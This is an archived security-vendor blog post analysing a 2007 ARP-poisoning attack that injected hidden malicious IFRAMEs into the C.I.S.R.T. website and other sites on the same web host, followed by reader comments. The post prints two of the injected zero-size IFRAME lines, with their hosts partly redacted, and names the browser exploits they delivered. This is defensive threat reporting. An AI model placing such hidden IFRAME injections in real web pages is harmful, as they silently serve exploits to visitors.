About Me

Geok Meng Ong

Geok Meng Ong
Senior Research Manager

Read More

Feeds & Podcasts

Blogs

Meet the Bloggers

Archive

Tags

#SecChat $1 million guarantee 12 Scams of Christmas access to live fraud resolution agents Acquisition Alex Thurber Android antivirus Apple botnet Channel Partners cloud security Compliance Consumer counter identity theft credit card fraud and protection credit fraud alerts credit monitoring credit monitoring and resolution critical infrastructure Cyber Security Mom cyberbullying Cybercrime cybermom data breach data center data center security Data Protection Dave DeWalt DLP Email & Web Security embedded encryption Endpoint Protection enterprise facebook fake anti-virus software Family Safety Friday Security Highlights global threat intelligence google government Hacktivism how to talk to kids how to talk to teens identity fraud identity fraud scams identity protection identity protection $1 million guarantee identity protection fraud identity protection surveillance identity surveillance identity theft identity theft expert identity theft fraud identity theft protection identity theft protection product Identity thieves and cybercriminals intel iphone kids online behavior lost wallet protection malware McAfee McAfee Channel McAfee Family Protection McAfee Identity Protection McAfee Initiative to Fight Cybercrime McAfee Labs McAfee security products Mid-Market Mobile mobile malware mobile security monitor credit and personal information Network Security online personal data protection online safety Operation Aurora PCI personal identity theft fraud personal information loss personal information protection phishing privacy proactive identity protection proactive identity surveillance Public Sector restore credit and personal identity Risk and Compliance scam scams scareware security smartphones social media social networking social networks spam Stuxnet twitter vulnerability Web 2.0 work with victim restore identity

McAfee Labs :

ARP Spoofing: Is Your Web Hosting Service Protected ?

Thursday, October 4, 2007 at 6:45am by Geok Meng Ong
Geok Meng Ong

Over the last couple of months, we have discussed a few times about how public and commercial web hosting services can be abused to host malware, exploits and send spam.

This week was the “golden week” holiday season in China, and hackers decided that this is a good opportunity to catch administrators off guard. The Chinese Internet Security Response Team (C.I.S.R.T.) announced in their blog on Tuesday, October 2nd, that malicious IFRAMEs were inserted into several of their web pages. McAfee Avert Labs got in touch with C.I.S.R.T. researchers quickly to understand the impact and method of intrusion.

According to C.I.S.R.T.’s own investigations, it was an ARP poisoning attack originating from the web service provider’s network. And you guessed it, the web service engineers are away for the week.

ARP poisoning is a man-in-the-middle style attack that injects malicious code into communication between the gateway and the web servers. On the C.I.S.R.T. website, the following malicious IFRAME links were inserted into existing web pages:

<iframe src=http://mms.n{blocked}mn.com/{blocked}.htm width=0 height=0 frameborder=0></iframe>

In our research, we found at least two vulnerabilities that are being targeted by the obfuscated exploits inserted into the web pages – Exploit-MS06-014 and Exploit-BaoFeng.a. Both vulnerabilities had been patched by their respective vendors, and the latter, affected a popular Chinese media player. A quick check on several other virtual hosts on the same provider, we found at least one more web site that is also injected with malicious links:

<iframe src=http://kiss99.{blocked}.net width=0 height=0></iframe>

ARP poisoning is old school but it can still be deadly when used in a virtual domain hosting environment, allowing an attacker to infect many websites from one gateway as seen in some instances of the HTool-MPack attack, affecting thousands of websites. Zhu Cheng, a colleague and researcher in McAfee Avert Labs, describes how web page code injection is achievable via ARP spoofing in his blog. Trojan tool kits such as NetSniff have these functionalities built-in, making it easy for attackers to perform it. On the hand, it a “noisy” technique and spoofed ARP packets can be easily detected on the wire.

If you had planned to review your website’s security and discuss it with your service provider, now might be good time.

Š

Bookmark and Share

Submit your own comments / message for this post

Your email is never published nor shared. Required fields are marked *

 

You may use these HTML tags and attributes: <a href="" title=""> <abbr title=""> <acronym title=""> <b> <blockquote cite=""> <cite> <code> <del datetime=""> <em> <i> <q cite=""> <strike> <strong>

Comments (4)

  • استضافة مواقع December 29, 2007 7:55AM

    ARP Spoofing: Is Your Web Hosting Service Protected ?
    the web service engineers are away for the week.

    Reply
  • Know Your Enemy - Behind_the_Scenes_of_Malicious_Web_Servers December 3, 2007 12:59AM

    [...] performs man-in-the-middle attacks, such as ARP spoofing 11, to include the malicious content. In the case of ARP spoofing, the administrator of the web page cannot find any direct evidence of malicious pages on the web site, but users are attacked nevertheless.[...]

    Reply
  • 中国セキュリティ機関のサイト攻撃、Webホスティングサービスを悪用 October 6, 2007 10:32PM

    [...] McAfeeはC.I.S.R.T.の研究者と協力し、不正侵入の方法などについて調査した[...]

    Reply
  • Carlyle October 4, 2007 7:02PM

    Security seems to be the most haunting issue nowadays so far as web hosting service is concerned. Your article is really informative. Thanks.

    Reply